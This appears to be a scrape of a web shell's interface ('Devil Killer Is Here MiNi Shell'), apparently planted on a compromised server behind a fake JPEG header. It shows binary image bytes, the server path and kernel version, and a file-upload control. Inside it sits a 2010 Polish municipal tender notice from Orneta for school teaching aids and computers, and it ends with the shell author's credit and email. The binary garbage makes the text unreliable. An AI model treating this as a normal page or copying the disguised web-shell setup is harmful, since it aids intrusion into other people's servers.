JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100301/54932-N-2010.html

<p class="kh_header"><b>Orneta: Dostawa pomocy dydaktycznych  i sprzętu multimedialnego do szkół podstawowych Gminy Orneta realizowana w ramach projektu
Mądre dzieciaki - nowoczesne techniki edukacyjne placówek oświatowych gminy Orneta</b><br>
<b>Numer ogłoszenia: 54932 - 2010; data zamieszczenia: 01.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orneta , pl.    Wolności 26, 11-130 Orneta, woj. warmińsko-mazurskie, tel. 055 2421116, faks 055 2422990.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.orneta.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych  i sprzętu multimedialnego do szkół podstawowych Gminy Orneta realizowana w ramach projektu
Mądre dzieciaki - nowoczesne techniki edukacyjne placówek oświatowych gminy Orneta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  dostawa pomocy dydaktycznych  i sprzętu multimedialnego do szkół podstawowych Gminy Orneta realizowana w ramach projektu  Mądre dzieciaki - nowoczesne techniki edukacyjne placówek oświatowych gminy Orneta. 
Przedmiot zamówienia będzie realizowany z podziałem na trzy części tj. 
Część 1 -  Dostawa pomocy dydaktycznych do szkół podstawowych Gminy Orneta
Część 2 -  Dostawa zestawów komputerów, laptopa i urządzenia wielofunkcyjnego  do szkół podstawowych Gminy Orneta
Część 3 -  Dostawa szkolnego multimedialnego zestawu do nauki języków obcych, tablic interaktywnych, projektorów, ekranów, magnetofonów do szkół podstawowych Gminy Orneta
2.  Zakres rzeczowy zamówienia obejmuje: 
1)Dla części  1 przedmiotu zamówienia : 
Zakup i dostawę pomocy dydaktycznych do szkół podstawowych Gminy Orneta wg  
poniższego  zestawienia:
a)zestaw brył transparentnych - 20 zestawy
b)nazywamy emocje materiał obrazkowy - 18 zestawów
c)oś czasu - 4 zestawy
d)liczydło kolorowe - 50 sztuk
e)tabliczka mnożenia ABACO 100 - 30 zestawów 
f)komplet brył składanych  - 30 zestawów
g)sygnalizator świetlny (model) - 4 sztuki
h)znaki drogowe (modele)  - 6 kompletów
i)szkolny mikroskop - 12 sztuk
2)Dla Części 2 przedmiotu zamówienia : 
Zakup i dostawę zestawów komputerowych, laptopa i urządzenia wielofunkcyjnego  do szkół podstawowych Gminy Orneta wg poniższego zestawienia:
a)zestaw komputerowy - 32 zestawy
b)laptop - 1 sztuka
c)urządzenie wielofunkcyjne - 1 sztuka
oraz zainstalowanie i konfigurację dostarczonego sprzętu oraz oprogramowania 
3)Dla Części 3 przedmiotu zamówienia :
Zakup i dostawę  szkolnego multimedialnego zestawu do nauki języków obcych, tablic interaktywnych, projektorów, ekranów, magnetofonów  wg poniższego zestawienia:
a)szkolny multimedialny zestaw do nauki języków obcych - 1 zestaw
b)tablica interaktywna - 4 sztuki
c)projektor + ekran + wskaźnik - 4 sztuki
d)magnetofon - 5 sztuk
oraz zainstalowanie i konfigurację dostarczonego sprzętu i oprogramowania, montaż mebli,  przeszkolenie personelu pedagogicznego w zakresie obsługi pracowni językowej, tablic interaktywnych, projektorów ( minimum 2 osoby z każdej z czterech szkół)
3.Szczegółowy opis przedmiotu zamówienia dla poszczególnych części zamówienia przedstawiony został w  Rozdziale III niniejszej SIWZ .
4.W przypadku składania ofert na więcej niż jedną część zamówienia na każdą część należy złożyć  odrębną ofertę zgodnie z § 18 IDW
Uwaga:
Przedstawione w specyfikacji istotnych warunków zamówienia wskazania na znaki towarowe, patenty lub pochodzenie sprzętu, pomocy dydaktycznych należy   rozumieć jako określenie wymaganych minimalnych parametrów technicznych lub  standardów jakościowych i traktować jako przykładowe, ze względu na zasady ustawy prawo zamówień publicznych, a zwłaszcza art. 29 tej ustawy. Oznacza to, że wykonawcy mogą zaproponować inne rozwiązania, z zachowaniem odpowiednich, równoważnych, tj. o nie gorszych parametrach technicznych i standardach  jakościowych niż wskazane w specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający   przewiduje udzielenie zamówień uzupełniających na dostawę pomocy dydaktycznych  i sprzętu multimedialnego. Wielkość zamówienia uzupełniającego do 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 39.16.00.00-1, 39.16.21.00-6, 30.23.00.00-0, 38.63.40.00-8, 38.65.21.00-1, 38.65.34.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części 1, 2 i 3  Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW.
Ocena spełnienia warunku nastąpi dla Części 1, 2 i 3  na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku  spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do  uzupełnienia dokumentu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Dla Części 1 i 2 Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy o którym mowa § 6 ust.1 pkt 1 IDW.  
b) Dla Części  3  - wykonawca  wykaże, że:  w okresie ostatnich trzech lat przed   
upływem terminu składania ofert , a  jeżeli okres  prowadzenia działalności jest krótszy  w tym okresie wykonał należycie lub w przypadku świadczeń okresowych i ciągłych wykonuje należycie co najmniej:
- 2 dostawy obejmujące dostawę wyposażenia pracowni językowych w sprzęt 
multimedialny i meble o łącznej wartości brutto  min. 40 000 zł .
Ocena spełnienia warunku dla Części 1 i 2 nastąpi na podstawie załączonego przez 
wykonawcę do oferty oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy wymienionego § 6  ust.1 pkt 1 IDW , a dla Części 3  na podstawie załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych w  § 6 ust. 1 pkt 2 IDW. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia  dokumentu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części 1, 2 i 3  Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy o którym mowa § 6 ust.1 pkt 1 IDW.  
Ocena spełnienia warunku nastąpi dla Części 1, 2 i 3  na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku  spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części 1, 2 i 3  Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy o którym mowa § 6 ust.1 pkt 1 IDW.  
Ocena spełnienia warunku nastąpi dla Części 1, 2 i 3  na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku  spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części 1, 2 i 3  Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi dla Części 1, 2 i 3  na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku  spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Informacja o przewidywanych zmianach postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy:
1)Zgodnie z art. 144 ustawy Pzp Zamawiający dopuszcza możliwość dokonania czynności prawnej polegającej na zmianie postanowień zawartej umowy w sprawie zamówienia publicznego w stosunku  do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
2) Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian  zawartej umowy:
a) Konieczność przedłużenia terminu umownego zakończenia poszczególnych Części  zamówienia z uwagi na: 
-konieczność wprowadzenia zmian w dostawie  w trakcie realizacji przedmiotu umowy z przyczyn niezależnych od  wykonawcy np. gdy oferowany sprzęt, pomoce, akcesoria nie są i nie będą dostępne na rynku lub zaprzestano ich produkcji. W takim przypadku Dostawca może zaproponować nowocześniejsze zamienniki o lepszych parametrach technicznych w niezmienionej cenie w stosunku do oferty. Dostawca winien pisemnie poinformować Zamawiającego o konieczności zmiany oraz dostarczyć pisemne potwierdzenie producenta lub dystrybutora o wycofaniu towaru z rynku.
-z przyczyn leżących po stronie Zamawiającego dotyczące np. braku przygotowania miejsca dostawy,
-z innych niezawinionych przyczyn spowodowanych przez tzw. siłę wyższą
o okres opóźniający lub wstrzymujący realizację zamówienia pod warunkiem 
wyrażenia zgody przez Instytucję Wdrażającą Regionalny Program Rozwoju Regionalnego Warmia Mazury na lata  2007- 2013 na zmianę terminu zakończenia przedmiotu umowy. 
b) Zmianę wynagrodzenia wykonawcy w przypadku:
-zmiany zakresu rzeczowego przedmiotu zamówienia tj zmniejszenia zakresu     
rzeczowego przedmiotu zamówienia,
-zmiany stawki podatku VAT 
c) Zmianę zakresu rzeczowego przedmiotu umowy
d) Zmianę sprzętu multimedialnego, pomocy dydaktycznych, akcesorii   na sprzęt 
multimedialny, pomoce dydaktyczne, akcesoria o parametrach  nie gorszych niż określone przez Zamawiającego, spełniający minimalne wymagania Zamawiającego, o ile zmiana taka będzie korzystna dla zamawiającego i wynika ze zmiany parametrów  technicznych sprzętu,  wycofania ze sprzedaży lub w przypadku upadłości producenta  sprzętu 
e) Zmianę warunków płatności w przypadku posiadania przez Zamawiającego środków finansowych - faktury przejściowe
f)  Zmianę w zatrudnieniu podwykonawców w przypadku, gdy Wykonawca oświadczył, iż wykona umowę osobiście w zakresie zgodnym ze SIWZ oraz zmiany osobowej podwykonawców oraz zakresu podwykonawstwa, 
g) Oznaczenie stron umowy, wyłącznie w wyniku dozwolonego w myśl ustawy Prawo zamówień publicznych następstwa prawnego albo zmiany nazwy lub innego 
oznaczenia strony (firmy) wynikającego z prawa albo dozwolonych prawem 
czynności powodujących taką zmianę.
h)  Konieczność wprowadzenia  zmian  wynika z okoliczności, których nie można  
było przewidzieć w chwili zawarcia umowy, a są one korzystne dla zamawiającego 
3) Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy.
W przypadku zmiany umowy zostanie przeprowadzona następująca procedura:
-Wykonawca prześle Zamawiającemu projekt zmian do umowy (aneks) wraz z pisemnym uzasadnieniem. Wykonawca jest zobowiązany do ich udokumentowania  w sposób nie budzący żadnych zastrzeżeń i wątpliwości 
-Zamawiający udzieli pisemnej odpowiedzi lub odeśle podpisany aneks do umowy   
wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.orneta.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Stanowisko d/s zamówień publicznych (kam.A- parter).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2010 godzina 11:00, miejsce: Urząd Miejski w Ornecie 11-130 Orneta, Plac Wolności 26 - Sekretariat pok. nr 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013
Oś priorytetowa 3 Infrastruktura społeczna,
działanie 3.1 Inwestycje w infrastrukturę edukacyjną..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pomocy dydaktycznych do szkół podstawowych Gminy Orneta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy zamówienia obejmuje: 
Zakup i dostawę pomocy dydaktycznych do szkół podstawowych Gminy Orneta wg  
poniższego  zestawienia:
a)zestaw brył transparentnych - 20 zestawy
b)nazywamy emocje materiał obrazkowy - 18 zestawów
c)oś czasu - 4 zestawy
d)liczydło kolorowe - 50 sztuk
e)tabliczka mnożenia ABACO 100 - 30 zestawów 
f)komplet brył składanych  - 30 zestawów
g)sygnalizator świetlny (model) - 4 sztuki
h)znaki drogowe (modele)  - 6 kompletów
i)szkolny mikroskop - 12 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 38.63.40.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.05.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa zestawów komputerów, laptopa i urządzenia wielofunkcyjnego  do szkół 
podstawowych Gminy Orneta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy zamówienia obejmuje: 
1) Zakup i dostawę zestawów komputerowych, laptopa i urządzenia wielofunkcyjnego  do szkół podstawowych Gminy Orneta wg poniższego zestawienia:
a)zestaw komputerowy - 32 zestawy
b)laptop - 1 sztuka
c)urządzenie wielofunkcyjne - 1 sztuka
2)zainstalowanie i konfigurację dostarczonego sprzętu oraz oprogramowania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa szkolnego multimedialnego zestawu do nauki języków obcych, tablic interaktywnych, projektorów, ekranów, magnetofonów do szkół podstawowych Gminy Orneta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy zamówienia obejmuje: 
1)Zakup i dostawę  szkolnego multimedialnego zestawu do nauki języków obcych, tablic interaktywnych, projektorów, ekranów, magnetofonów  wg poniższego zestawienia:
a)szkolny multimedialny zestaw do nauki języków obcych - 1 zestaw
b)tablica interaktywna - 4 sztuki
c)projektor + ekran + wskaźnik - 4 sztuki
d)magnetofon - 5 sztuk
2)Zainstalowanie i konfigurację dostarczonego sprzętu i oprogramowania, montaż mebli,  przeszkolenie personelu pedagogicznego w zakresie obsługi pracowni językowej, tablic interaktywnych, projektorów ( minimum 2 osoby z każdej z czterech szkół).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 39.16.00.00-1, 30.23.00.00-0, 38.65.21.00-1, 38.65.34.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com